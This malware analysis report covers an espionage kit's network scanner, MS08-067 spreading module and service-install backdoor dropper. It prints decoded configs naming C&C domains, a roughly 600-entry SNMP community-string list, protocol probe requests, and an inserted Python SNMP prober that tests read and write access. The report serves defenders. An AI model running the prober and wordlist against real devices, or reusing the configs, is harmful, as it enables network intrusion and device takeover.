Due to a design decision by the developer, usage of this module is limited. It seems that it was developed and tested as an EXE file; however, in the release version it was compiled as a DLL. This change was extremely significant for the whole functionality, which creates a number of worker threads right in the main function. That is fine for an EXE module's WinMain function, but is restricted for a library's DllMain function. This broke the module, as it created threads which couldn't run when the DLL is loaded via the LoadLibrary API. However, it's important to note that the developers implemented their own PE loader, which doesn't have this limitation of the Windows native PE loader, which is why the module can still be used as a component of the malicious kit.

DllMain function

The current sample has the following embedded config:

SetOption(conn_a.D_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")
SetOption(conn_a.D_NAME, [15] "/cgi-bin/nt/sk")
SetOption(conn_a.D_RPRT, [3] "80")
SetOption(conn_a.D_SPRT, [3] "80")
SetOption(conn_a.D_USER, [21] "%removed%")
SetOption(conn_a.D_MODE, 0x0033)
SetOption(conn_a.D_PASS, 0x00)
SetOption(conn_a.J_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")
SetOption(conn_a.J_NAME, [15] "/cgi-bin/nt/th")
SetOption(conn_a.J_USER, [21] "%removed%")
SetOption(conn_a.J_RPRT, [3] "80")
SetOption(conn_a.J_SPRT, [3] "80")
SetOption(conn_a.J_MODE, 0x0033)
SetOption(conn_a.J_PASS, 0x00)
SetOption(conn_a.VERSION_ID, [6] "51070")
SetOption(conn_a.SEND_DELAY_TIME, [6] "20000")
SetOption(conn_a.VER_SESSION_ID, [11] "%removed%")
SetOption(NET, [26] "127.0.0.1 255.255.255.255")
SetOption(netscan_get_NET, "1")
SetOption(netscan_get_net_ad, "1")
SetOption(netscan_get_net_msnet, "1")
SetOption(netscan_get_net_msdom, "1")
SetOption(netscan_threads_num, [3] "64")
SetOption(netscan_tcpscanwinsrv, "1")
SetOption(netscan_tcpscanwin, "0")
SetOption(netscan_tcpscannotwin, "0")
Call(task_netscan)
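The decoded-resource listings in this report all use the same SetOption()/Call() notation, and the same conn_a.* block recurs in the MSExploit and DASvcInstall configs below. The following parser is an added example, not Kaspersky's tooling or the malware's own config code: it turns such a listing into a dict and pulls out the C&C domains, URL paths, ports and target lists. One assumption is built in and checked: the "[N]" prefix is the option buffer length including the terminating NUL, which holds for every string on this page (for instance [15] for the 14-character "/cgi-bin/nt/sk"); a mismatch is reported rather than silently accepted. The embedded sample configs are copied from this page.

```python
"""Parser for the decoded SetOption()/Call() resource scripts listed in this report.

Added example, not Kaspersky's tooling. Assumption: the "[N]" prefix is the option
buffer length including the terminating NUL; any string that disagrees is reported."""
import re

STMT_RE = re.compile(r'^(?P<kind>SetOption|Call)\((?P<name>[\w.]+)(?:\s*,\s*(?P<val>.*?))?\s*\)$')
STR_RE = re.compile(r'^(?:\[(?P<n>\d+)\]\s*)?"(?P<s>.*)"$')
HEX_RE = re.compile(r'^0x[0-9a-fA-F]+$')
BLOB_RE = re.compile(r'^(?P<n>\d+)\s+bytes\b')

# Netscan config as listed above on this page.
NETSCAN_CONFIG = """
SetOption(conn_a.D_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")
SetOption(conn_a.D_NAME, [15] "/cgi-bin/nt/sk")
SetOption(conn_a.D_RPRT, [3] "80")
SetOption(conn_a.D_SPRT, [3] "80")
SetOption(conn_a.D_USER, [21] "%removed%")
SetOption(conn_a.D_MODE, 0x0033)
SetOption(conn_a.D_PASS, 0x00)
SetOption(conn_a.J_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")
SetOption(conn_a.J_NAME, [15] "/cgi-bin/nt/th")
SetOption(conn_a.J_RPRT, [3] "80")
SetOption(conn_a.VERSION_ID, [6] "51070")
SetOption(conn_a.SEND_DELAY_TIME, [6] "20000")
SetOption(conn_a.VER_SESSION_ID, [11] "%removed%")
SetOption(NET, [26] "127.0.0.1 255.255.255.255")
SetOption(netscan_get_NET, "1")
SetOption(netscan_threads_num, [3] "64")
Call(task_netscan)
"""

# Excerpt of the DASvcInstall config from later on this page (shows list-valued options).
DASVC_EXCERPT = """
SetOption(da_svc_exe_loc, 103424 bytes of Frog backdoor)
SetOption(da_svc_exe_name, "testsvc_00.exe")
SetOption(da_svc_send_proxy, 0x0079)
SetOption(da_svc_host)
SetOption(da_svc_host, [15] "%Target1_IP%")
SetOption(da_svc_host, [14] "%Target2_Hostname%")
SetOption(da_svc_host, [16] "%Target3_IP%")
Call(task_da_svcinstall)
"""


def _is_redacted(s):
    return s.startswith("%") and s.endswith("%")        # %removed%, %Target IP% ...


def parse_value(name, raw, mismatches):
    raw = raw.strip()
    if _is_redacted(raw):
        return raw
    m = STR_RE.match(raw)
    if m:
        s, n = m.group("s"), m.group("n")
        if n is not None and not _is_redacted(s) and int(n) != len(s) + 1:
            mismatches.append((name, int(n), len(s)))     # declared length disagrees with string
        return s
    if HEX_RE.match(raw):
        return int(raw, 16)
    m = BLOB_RE.match(raw)
    if m:
        return {"blob_bytes": int(m.group("n"))}          # embedded binary (e.g. the Frog payload)
    return raw                                            # unknown form: keep verbatim, never guess


def parse_script(text):
    options, calls, mismatches = {}, [], []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = STMT_RE.match(line)
        if not m:
            raise ValueError("unparsed statement: %r" % line)
        kind, name, raw = m.group("kind"), m.group("name"), m.group("val")
        if kind == "Call":
            calls.append(name)
        elif raw is None:
            options.setdefault(name, [])     # bare SetOption(name) opens a list (da_svc_host, msexploit_ip)
        elif isinstance(options.get(name), list):
            options[name].append(parse_value(name, raw, mismatches))
        elif name in options:
            options[name] = [options[name], parse_value(name, raw, mismatches)]
        else:
            options[name] = parse_value(name, raw, mismatches)
    return {"options": options, "calls": calls, "mismatches": mismatches}


def extract_iocs(options):
    """Network indicators: C&C domains (D_CONN/J_CONN are ';'-separated), URL paths, ports, targets."""
    domains, paths, ports, targets = set(), set(), set(), []
    for name, value in options.items():
        key = name.rsplit(".", 1)[-1]
        if key in ("D_CONN", "J_CONN"):
            domains.update(d for d in str(value).split(";") if d)
        elif key in ("D_NAME", "J_NAME"):
            paths.add(value)
        elif key in ("D_RPRT", "D_SPRT", "J_RPRT", "J_SPRT"):
            ports.add(int(value))
        elif key in ("da_svc_host", "msexploit_ip"):
            targets.extend(value if isinstance(value, list) else [value])
    return {"domains": sorted(domains), "paths": sorted(paths), "ports": sorted(ports), "targets": targets}


if __name__ == "__main__":
    parsed = parse_script(NETSCAN_CONFIG)
    print(extract_iocs(parsed["options"]), parsed["calls"], parsed["mismatches"])
```

Feeding every config listed in this report through extract_iocs() gives a de-duplicated domain and path list suitable for a blocklist; the length check is a cheap way to spot a listing that was damaged during copy-paste.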

The target networks to scan are selected automatically and include the following lists:

1. networks specified in the config NET variable, if netscan_get_NET is set to 1
2. subnets of IPs visible from the adapter configuration via the GetAdaptersInfo API (current IP, gateway, DHCP and WINS servers)
3. subnets of IPs visible in the list of currently mapped shared folders
4. subnets of IPs which are part of the current Microsoft Windows domain, as reported by the Domain Controller

Scanning procedure

The scan begins with pinging the target with a 2 second timeout. Then the scanner gets the target's hostname and MAC address. After that it tries to send an SNMPv3 request. Unlike SNMPv1/v2c agents, which silently drop requests with a wrong community string, an SNMPv3 agent responds (with a report PDU) even if the username is wrong, which lets the scanner identify whether the port is open. If the remote SNMP agent responds, the scanner tries to talk further.

SNMP packet from malware in Wireshark

It tries to guess the SNMP agent community name from a list of 600 hardcoded variants. The list itself is interesting, as it seems to be made of previously discovered SNMP community names from various locations where the attackers managed to penetrate networks.

We are sharing the list; maybe it will help someone identify their own SNMP community name and prompt further network checks:

public Petrofac henrygiz publio

private Private hp_admin publis

1q2w3e Ptbnic i6666 publiw

1q2w3e4r Ptcmic icces publkB

1q2w3e4r5t PuBMic ilmi publkc

1q2w3e4r5t6y Public intelligence publmc

cscAstral RM24655521 intermec publoc

@5tr0Mon1 RcFnsSnCo20m08R internal publxc


1qazxsw23edc RnfE36mM ipko publyc

3edcxzaq12 RoaringKat ipxint publ{C

123ewqasdcxz SECRET itorocmn publ{c

!@#ewqASDcxz SECURITY jessica pubmi?

!QAZxcde32 SINetMGT jg214327 pubmia

qsczse SNMP jimaguas pubmic

234rfvcxsw SNMP_trap jozefina pubn

$3eTn27W#7 SPBranc1d-Rw jpiworldwide pubn)c

10101 SWITCH karZer pubni?

3101974 SYSTEM kazeem pubni?"

0392a0 SbcihAiryq52 kbiway2007 pubnib

41309 Secret kbiway2008 pubnic

6051983 Security kerrek pubpc1

80808 Si4m2010AyZnFkDe45L kittec pucliC

0ublic Slay1987 kokale puclic

1021947 Soco kokale1980 puclic?

1100293 Sr.h3Q6i koko puclik

112511polo Switch konsulro pucmic

1212x System korablik pufl

123123321 TENmanUFactOryPOWER korona puflic

1234 TEST krakoziabra pufli{

123456 TRD_VSAT kuwait pufmyc

12345678 W1ld#Parr0ts kyw.u61 puglic

1,23457E+17 YDFWgSKh lapublic pujlic

1,23457E+17 YXaLmb1t5Ras laura pur-i?

123o321 YsZpL5RqMa76 lebanon pur??1

126ajm19kal51ma Z123456z lfcadoot purlic

130601 Zxcvbnm123 lhlyy0320 purlig

1,32413E+15 `ublic linda pusac

13244231 a1b2c3d4 louvain pwbli#

13971852654 absurdistan_81 loveme pwblic

162534 access macedonia pwjlic

17081- adimn makbank23 p}1??1

170810 admin manager qazwsx

1809BGD11 admin1 manuel qazxcdew

1940117 adonis mariam qubl?3

1947102 agent marius qwedcxza


19841990 agent_steal martin qwer1234

199397 ajutorsoci mary1964 qwerty

19M1R20S akjol1230 meerim0909 qwerty123456

1Q5IRJmg9Q alfa239 merlin62 qwertyu

1q2w3e alfa2390 mesurucu qwertyui

1q2w3e4r alfred metiha r0snmp$tr1ng

1q2w3e4r5t all private mfa123MFA r23771

1q2w3e4r5t6y all public mfa6789 rainbow

1qazxsw23edc alpha mfalOVAL rbnpublic

2005 amBa3#wsx mimoza rccm-map

21012008a amsterdam2003 mirella read

212321a andrey240787 mirella26091978 read-only

24021985 antoniu mitrkq1w2e3 read-write

240787 arbor mmat1230 readonly

2531821 assistant2007 mmat1987 readwrite

280d1a03 astalavista mngt regional

285468339 at.prague mofa rekzi

29091972 at@szat mohammed richka

2read aublic moni4man rm5tbd23

31sal999 auok12 monitor rmon

378dd6 avsvMda monitoring rmon_admin

3DB5ZG baborasa1234 mq5Kg9iG ro4orion

3MC-Zuku-Rw backb00r mrtg ro81qnp4

43827207V backupauto ms03101974 roembil

4changes badarsul msnadm romania2

4udoju badarsul86 mudrost999 root

549yotok bandwidth nasasiet router

553322 bar789 nasawr1 rusinfonet

5bpbpyHeLu0a9Ab bathclnet nature rw4orion

5zzkzp batru_ro netman rwcfcmp1s

626fqs benj2023 netman2002 s3cr3t

63Fd6dYhMnsjMNPk benjaminfranklin network sabonis

654321 bintec nina180754 safara

6551318 blue none salvaje07

693ygUgv boksha noppes san-fran

722690 br0adwhy norformin sanfran


7777777inchinas bratan notprivate sayyara

789456 breakpoint notpublic scotty

7917407 bumblebee notpulic seCtion%

794613 bunnia2010 nr.490315 seait

7nsi20 c20176 ntnhflm secret

7p1cCcZvqY6T cable-d nurtenbay security

80244 cable-docsis nvaiaJC4 sel1

816836 canon_admin okoloamaraa seri

83L80N3 ccrthwtd openview sirti

8491 cde32wsxzaq1 oyeneye sitalan

8591 chelyabinsk p0l!@#nms skl1971

8888888 chera98888 p3j4nt4n slamat

8ublic chiaro p5blic snmc-read

8urlib chumburidze p9EGn25D snmp

<removed> cisco pUbhic snmpd

AKdGmjQO cisco-adsl parrral snmptrap

ANYCOM clingendael pass solaris

Admin cme_1823 password sonjaGRIESEL7475@31

Afoltz-PB commread pgnred sovam

Allahu community picpu sp3ctr0

Andrey131201 commwrite polaris stanislavl

Bl234353 control polmrtg stopsign

C0de corba polsnmp superuser

C0mmunity[hezt00a1 core porneste switch

C0mmunity[hezt00a2 correyvba post system

C0mmunity[hezt00aa3 cp8S52aA pounette t1HAI2nai

C0mmunity[hezt00b1 cpecwr99 power222 talgat

C495y5m6T1 cpecww99 ppb(260685) tasevski1980

CISCO cs1bhS8W pqblic tech

CONSIP_MIB csi-rain pqpq-1957 telecom

CR52401 cucurigu pr1ap1014 temp

D1g!T da123456 pr1v4t3 test

DNOT?ISTLE dasakirov priemnaja test123

DNOTHISTLE debug privat test2

E142BERLINO deeplomat provision tiv0li

EC_IMCO default proxy tivoli

ET0021B7E49CC9 dilbert prtgmail topnet


G1Mme1nf0 diver pu6lik toto29+

GINL-!M3npEFF dk0208 pu?hi? trap

GN0CR3AD dollys pu?l trappss

GSBTBMPLS! drazen024 pu?l)c traps

GWAN_g,2b?l?m0nit0r efimerida pu?l`b udelcakil

GWAN_gl0baL??k?? elchin2491 pu?lib undefined

GWAN_gl0bal_m0gid0r elen24 pu?lic uragan

GWAN_gl0bal_m0nit0? eman72 pu?lik user

GWAN_gl0bal_m0nit0r embassy pu?lyc vakvouk2008

GWAN_gl0bal_mxJ?6?v enable puBlic vanoord-ro

GulNozMeh f6PF3T9T pu`lic vfczyz

HDDBELBXL fabian pub?ic victor

HITMAN fake2011 pubdic vizirenok

ILMI fastanefnd1 pubhic vkananovich

Intermec field publ vpnaccount

Jedeee71 field-service publ)c vt100num

JoJo finance publ1c w03kdpopmail

KBRlog3CPRK forescout publ?3 wallace

L#39YWh7N16w fourthmile publac world

Lcxuidtg freekevin publhc write

Mailbox fubar publi# writeletters

Manyasha fwrocmn publi+ xs159109

Mihnea@109 fwwrcmn publi? xyzzy

NURTENEKREM g0v53vM3 publia yOpZpXjI

NoGaH$@! germanos publib yellow

OrigEquipMfr gestione public!!! z4885645

P@SSW0RD gsoficom14 public1 zafar

PRIVATE gu#3Gst. public2 zskmail

PUBLIC guest public3 zxcvbn

Petr0f`c gulbalam public? zzzzz

Petr0fac gwendal publig

Petr0fac? hello publik

The scanner fetches the SNMP agent's sysName property and checks whether the property is read-only or write access is available. Then it fetches the sysDescr property.

Interestingly, when the module finds a Cisco SNMP agent, it starts its own TFTP server and transfers the Cisco device configuration via TFTP. This is the standard Cisco mechanism: with a read-write community, an SNMP Set on the config-copy objects (CISCO-CONFIG-COPY-MIB, or the writeNet object of OLD-CISCO-SYS-MIB on older IOS) instructs the router to upload its running configuration to a TFTP server of the caller's choosing, which is why the write-access check above matters.
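The read check and the write check just described, as an added example that is not code from the malware or from Kaspersky: a stdlib-only SNMPv1 BER encoder and decoder, the GetRequest for sysName used to test a community for read access, the SetRequest that writes sysName back to its own value (the conventional harmless write test) used to test for write access, and a classifier for the agent's reply. The request-id values, the 2 second timeout (matching the ping timeout the report gives) and the choice of sysName as the write target are my own; snmp_probe() is the only function that touches the network and is meant for devices you are authorised to test.

```python
"""SNMPv1 community-string probe: read check (Get sysName) and write check (Set sysName).

Added example, not code from the malware or from Kaspersky. Stdlib only; the BER
encoder/decoder is hand-rolled so packets can be built and inspected offline."""
import socket

SYS_DESCR = (1, 3, 6, 1, 2, 1, 1, 1, 0)
SYS_NAME = (1, 3, 6, 1, 2, 1, 1, 5, 0)
GET_REQUEST, GET_RESPONSE, SET_REQUEST = 0xA0, 0xA2, 0xA3


def _ber_len(n):                       # definite-form BER length
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag, body):
    return bytes([tag]) + _ber_len(len(body)) + body


def _int(v):                           # INTEGER, minimal two's-complement encoding
    return _tlv(0x02, v.to_bytes(v.bit_length() // 8 + 1, "big", signed=True))


def _oid(arcs):                        # OBJECT IDENTIFIER, base-128 sub-identifiers
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return _tlv(0x06, bytes(out))


def build_message(pdu_type, community, request_id, varbinds, version=0, error_status=0):
    """varbinds: [(oid_tuple, value_tlv)]. version 0 = SNMPv1, 1 = SNMPv2c."""
    vbl = b"".join(_tlv(0x30, _oid(oid) + value) for oid, value in varbinds)
    pdu = _tlv(pdu_type, _int(request_id) + _int(error_status) + _int(0) + _tlv(0x30, vbl))
    return _tlv(0x30, _int(version) + _tlv(0x04, community.encode()) + pdu)


def get_request(community, oid, request_id=1):
    return build_message(GET_REQUEST, community, request_id, [(oid, _tlv(0x05, b""))])


def set_request(community, oid, value, request_id=2):
    return build_message(SET_REQUEST, community, request_id, [(oid, _tlv(0x04, value))])


def _tlv_at(buf, pos):
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    end = pos + length
    if end > len(buf):
        raise ValueError("truncated TLV")
    return tag, buf[pos:end], end


def _sint(body):
    return int.from_bytes(body, "big", signed=True)


def _decode_oid(body):
    arcs, val = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return tuple(arcs)


def parse_message(packet):
    tag, msg, _ = _tlv_at(packet, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _, ver, p = _tlv_at(msg, 0)
    _, community, p = _tlv_at(msg, p)
    pdu_type, pdu, _ = _tlv_at(msg, p)
    _, rid, q = _tlv_at(pdu, 0)
    _, err, q = _tlv_at(pdu, q)
    _, idx, q = _tlv_at(pdu, q)
    _, vbl, _ = _tlv_at(pdu, q)
    varbinds, q = [], 0
    while q < len(vbl):
        _, vb, q = _tlv_at(vbl, q)
        _, oid_body, r = _tlv_at(vb, 0)
        vtag, vbody, _ = _tlv_at(vb, r)
        varbinds.append((_decode_oid(oid_body), vtag, vbody))
    return {"version": _sint(ver), "community": community.decode("latin-1"),
            "pdu_type": pdu_type, "request_id": _sint(rid),
            "error_status": _sint(err), "error_index": _sint(idx), "varbinds": varbinds}


def classify(reply, expected_request_id):
    """'ok' = matching error-free response; 'error' = agent answered with an error-status
    (a read-only community answering a Set); 'mismatch' = not the reply we asked for;
    None = silence, which is all an SNMPv1/v2c agent gives for a wrong community."""
    if reply is None:
        return None
    m = parse_message(reply)
    if m["pdu_type"] != GET_RESPONSE or m["request_id"] != expected_request_id:
        return "mismatch"
    return "ok" if m["error_status"] == 0 else "error"


def snmp_probe(host, community, timeout=2.0, port=161):
    """Live check; returns 'write', 'read' or None. Only for devices you are authorised to test."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        def exchange(pkt):
            sock.sendto(pkt, (host, port))
            try:
                return sock.recvfrom(4096)[0]
            except socket.timeout:
                return None
        rid = 0x5163                                   # arbitrary request-id (assumption)
        reply = exchange(get_request(community, SYS_NAME, rid))
        if classify(reply, rid) != "ok":
            return None
        current_name = parse_message(reply)["varbinds"][0][2]
        # Writing sysName back to its current value: harmless, but only a RW community succeeds.
        if classify(exchange(set_request(community, SYS_NAME, current_name, rid + 1)), rid + 1) == "ok":
            return "write"
        return "read"
    finally:
        sock.close()
```

get_request("public", SYS_NAME) produces the 40-byte packet that any snmpget for sysName.0 sends, so it can be compared byte for byte with a capture such as the Wireshark screenshot referenced above. For an audit, iterate snmp_probe() over your own devices with the community names from the list; a "write" result on a Cisco box is exactly the condition the module needs for the TFTP config dump.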


CISCO configuration dumper function call graph

Next it checks the host for a SIP service. That is accomplished by sending an OPTIONS request to the remote host on port 5060 from the hardcoded source port 11122:

OPTIONS sip:smap@localhost SIP/2.0
Via: SIP/2.0/UDP %Local IP%:11122;branch=z9hG4bK.51125;rport;alias
From: ;tag=3a539be23b6269ec
To: sip:IPPhone@localhost
Call-ID: 1638708638@%Local IP%
CSeq: 3471 OPTIONS
Contact: <sip:IPPhone@%Local IP%:11122>
Content-Length: 0
Max-Forwards: 70
User-Agent: IPPhone 0.67
Accept: text/plain

The module simply saves the SIP server's response to a log file and goes to the next stage.

Next it tries to work with the NetBIOS (SMB) protocol of the remote target; the code includes a full custom implementation of the protocol negotiation and communication with the remote host. The module establishes an SMB NULL session, which does not require authentication, and sends further queries.

The scanning module connects to the \\LLSRPC pipe, which used to be reachable via an SMB NULL session on Windows 2000 before SP4. If an attacker connects to a Windows 2000 Server-based system through a null session, it is possible to use the Llsrpc named pipe to add or delete licenses and to create new license groups. However, availability of the LLSRPC pipe is checked only to detect the remote OS Service Pack version. There are a few other methods in the code that provide reliable detection of Service Pack 1, 2 and 3 of Windows 2000.

The next step is to detect the remote OS default language. That is accomplished by connecting to the Spoolss pipe and querying the name of the service. The response is normally sent in the system default language, which the module detects. Here is the list of languages hardcoded in the malware, which might indicate which systems the attackers are interested in:

UNKNOWN English Spanish Italian

French German Portuguese - Brazilian Portuguese

Hungarian Finnish Dutch Danish


Swedish Polish Czech Turkish

Japanese Chinese Traditional Chinese Traditional - Taiwan Korean

Russian

So far, the module collects the following information over SMB:

Target Name
NetBIOS Domain Name
NetBIOS Computer Name
DNS Domain Name
DNS Computer Name
Language
Service Pack
OS Version
OS Major Version Number
OS Minor Version Number
OS Build
OS Language ID
OS Version (alternative detection method)
OS Language (alternative detection method)

The module has another unique feature: it checks whether the system is vulnerable to MS08-067. It creates a path, part of which includes the unique string "\..\spider3", which we had not seen previously. The module is capable of constructing TCP bind shellcode for different versions of the remote OS to check whether the exploit works.

There is a portscanner in the module, and it checks ports from the embedded list:

22, 23, 53, 80, 110, 143, 156, 456, 912, 990, 993, 995, 1043, 1194, 1352, 1433, 2481, 3306, 5432, 8080, 8800

While most of the ports look standard, some of them are not very common. We decided to investigate which services are running on those ports.

156 – some SQL Server port (IANA lists it as "sqlsrv"), however we don't know any software running on port 156
456 – probably a typo of 465 (SMTP over SSL)
912 – VMware Authorization Service
990 – FTPS
995 – POP3S
1043 – can be used by BOINC software or Microsoft IIS
1194 – standard port for OpenVPN
1352 – Lotus Notes/Domino RPC
1433 – MS SQL Server
2481 – Oracle Server
3306 – MySQL Server
5432 – PostgreSQL
8080 – HTTP (alternate)
8800 – HTTP (SunWebAdmin)

If port 80 or 8080 is open, the module sends a simple HTTP request to test whether the remote web server is available and whether it is running Microsoft Exchange. MS Exchange is probed with the following HTTP request:


GET /ews/exchange.asmx HTTP/1.0

Collected information and logs are never saved to a file on disk; instead they are compressed using the Zlib compress2 function and uploaded to the server.

MSExploit module

Known variants:

MD5 Compilation date

51900a2bb1202225aabc2ee5a64dbe42 2012.06.26 15:11:48 (GMT)

Summary

The file is a PE DLL file without exported functions, compiled with Microsoft Visual Studio 2010. All the functionality is implemented in the DllMain function.

This module is used to infect other computers in the local area network using an old exploit for the vulnerability referred to as MS08-067. It checks the remote OS version, locale and SP version, crafts a packet with exploit code and pushes it to the target. It injects an executable payload, which drops another module known as "Frog" (a full description of Frog is available in a separate chapter). The latter is a backdoor component which provides the capability to run arbitrary executables on the remote target.

DllMain function

When loaded, the module retrieves its resource of type "BBB" and name "AAA", and starts an internal plugin framework. The main function of the module is named "task_msexploit" and is registered in the framework. Then it starts the framework main loop, effectively parsing the resource data and executing the list of actions encoded in the resource.

The decoded resource data for the known sample can be represented as the following script:

SetOption(conn_a.VERSION_ID, [6] "11997")
SetOption(conn_a.VER_SESSION_ID, %removed%)
SetOption(conn_a.SEND_DELAY_TIME, [5] "2000")
SetOption(conn_a.D_CONN, [60] "microsoftosupdate.com;microsoft-msdn.com;microsoftcheck.com")
SetOption(conn_a.D_MODE, 0x0033)
SetOption(conn_a.D_NAME, [18] "/cgi-bin/ms/flush")
SetOption(conn_a.D_PASS, 0x00)
SetOption(conn_a.D_RPRT, [3] "80")
SetOption(conn_a.D_SPRT, [3] "80")
SetOption(conn_a.D_USER, [21] "%removed%")
SetOption(conn_a.J_CONN, [60] "microsoftosupdate.com;microsoft-msdn.com;microsoftcheck.com")
SetOption(conn_a.J_MODE, 0x0033)
SetOption(conn_a.J_NAME, [18] "/cgi-bin/ms/check")
SetOption(conn_a.J_PASS, 0x00)
SetOption(conn_a.J_RPRT, [3] "80")
SetOption(conn_a.J_SPRT, [3] "80")
SetOption(conn_a.J_USER, [21] "%removed%")
SetOption(msexploit_loc, 147456 bytes PE file)
SetOption(msexploit_ip)
SetOption(msexploit_ip, [16] "%Target IP%")
Call(task_msexploit)

Main function (task_msexploit)

The config defines parameters for the method task_msexploit, which include the following:

msexploit_loc – a payload to be pushed if the exploit worked successfully;
msexploit_ip – an array of IPs to attack.

Then the module gets local proxy settings, starting with the MS Internet Explorer settings, then parsing Opera profile files (if they exist) and finally reading proxy settings from the following rather suspicious registry keys:

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapMenuConfigGrps
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapMenuConfigGrps
HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapMenuConfigGrps
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapMenuConfigGrps

The MapMenuConfigGrps registry value does not exist on a standard Windows system. We suspect that this registry value is set by a malicious module during the operation and is used to store proxy server parameters.

After that, the module attempts to find %AppData%\adt.dat. Two variants are checked, common and user-specific, i.e.:

C:\Documents and Settings\All Users\Application Data
C:\Documents and Settings\username\Application Data

The "adt.dat" file is an encrypted INI file of known credentials of users in the current domain and attacked organization. When decrypted, this file looks like this:

[user]
login = "%User1%"
domain = "%Domain%"
password = "%Password2%"
admin = "1"
[user]
login = "%User2%"
domain = "%Domain%"
password = "%Password2%"
admin = "1"

This information is checked against the local domain controller to find active users with Admin privileges. A verified account is used for the optional functionality of establishing a NetBIOS connection with the remote host to change the remote registry. However, the only setting that is changed is the MapMenuConfigGrps value mentioned above. It is set to the local system proxy parameters which were acquired before. This is done right after the main attack procedure, which uses the vulnerability from the MS08-067 Security Bulletin.

The MS08-067 attack procedure uses code identical to the vulnerable-host scanning code in the Netscan module. It starts with pinging the host with ICMP Echo requests and checking host availability. Then it does complex OS fingerprinting using several different approaches to guess the OS version, OS language and Service Pack version. After that it crafts a special packet and embeds the payload from the AAA config (the binary parameter named msexploit_loc, see above).

At the end of the exploitation process, the module checks the availability of the remote host by sending ICMP Echo requests again.

This module doesn't change the local registry, nor does it create any local files.

After completing the remote attack, the module sends logs to the C&C server. The connection options are retrieved from the configuration (resource):

Option name Description

D_CONN List of C&C domain names, separated by ';'

D_RPRT C&C server port

D_NAME Relative URL to send request to


The data sent to the C&C server is compressed with Zlib and encrypted with a modified PKZIP stream cipher, and then it is Base64-encoded.

DASvcInstall module

Known variants:

MD5 Compilation date

7ade5d2a88c1eeefe47b501b19c383ef 2012.06.26 15:11:34 (GMT)

Summary

The file is a PE DLL file without exported functions, compiled with Microsoft Visual Studio 2010. All the functionality is implemented in the DllMain function.

This module is used to infect other computers in the local area network with another module known as "Frog" (a full description of Frog is available in a separate chapter), which is embedded in the current executable. The latter is a backdoor component which provides the capability to run arbitrary executables on the remote target. To infect other computers, the current module uses the adt.dat password database file, which contains credentials of administrator accounts. The credentials are used to access the system administrative share and remotely install the backdoor as a service.

DllMain function

When loaded, the module retrieves its resource of type "BBB" and name "AAA", and starts an internal plugin framework. The main function of the module is named "task_da_svcinstall" and is registered in the framework. Then it starts the framework main loop, effectively parsing the resource data and executing the list of actions encoded in the resource.

The decoded resource data for the known sample can be represented as the following script:

SetOption(conn_a.VERSION_ID, [6] "11997")
SetOption(conn_a.VER_SESSION_ID, %removed%)
SetOption(conn_a.SEND_DELAY_TIME, [5] "2000")
SetOption(conn_a.D_CONN, [60] "microsoftosupdate.com;microsoft-msdn.com;microsoftcheck.com")
SetOption(conn_a.D_MODE, 0x0033)
SetOption(conn_a.D_NAME, [18] "/cgi-bin/ms/flush")
SetOption(conn_a.D_PASS, 0x00)
SetOption(conn_a.D_RPRT, [3] "80")
SetOption(conn_a.D_SPRT, [3] "80")
SetOption(conn_a.D_USER, [21] "%removed%")
SetOption(conn_a.J_CONN, [60] "microsoftosupdate.com;microsoft-msdn.com;microsoftcheck.com")
SetOption(conn_a.J_MODE, 0x0033)
SetOption(conn_a.J_NAME, [18] "/cgi-bin/ms/check")
SetOption(conn_a.J_PASS, 0x00)
SetOption(conn_a.J_RPRT, [3] "80")
SetOption(conn_a.J_SPRT, [3] "80")
SetOption(conn_a.J_USER, [21] "%removed%")
SetOption(da_svc_exe_loc, 103424 bytes of Frog backdoor)
SetOption(da_svc_exe_name, "testsvc_00.exe")
SetOption(da_svc_name, "testsvc_00_name")
SetOption(da_svc_send_proxy, 0x0079)
SetOption(da_svc_host)
SetOption(da_svc_host, [15] "%Target1_IP%")
SetOption(da_svc_host, [14] "%Target2_Hostname%")
SetOption(da_svc_host, [16] "%Target3_IP%")
Call(task_da_svcinstall)

Main function (task_da_svcinstall)

The config defines parameters for the method task_da_svcinstall, which include the following:

da_svc_exe_loc – a payload with the "Frog" backdoor to be pushed to the remote host;
da_svc_exe_name – defines the filename that will be used to store the backdoor;
da_svc_name – defines the service name that will be used to set up the backdoor service;
da_svc_send_proxy – if this value is set to 0x79, the proxy preferences of the current host are copied to the remote host's registry;
da_svc_host – a list of target hosts to attack.

Then the module gets local proxy settings, starting with the MS Internet Explorer settings, then parsing Opera profile files (if they exist) and finally reading proxy settings from the following rather suspicious registry keys:

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapMenuConfigGrps
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapMenuConfigGrps
HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapMenuConfigGrps
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapMenuConfigGrps

The MapMenuConfigGrps registry value does not exist on a standard Windows system. We believe that this registry value is set by a malicious module during the operation and is used to store proxy server parameters.

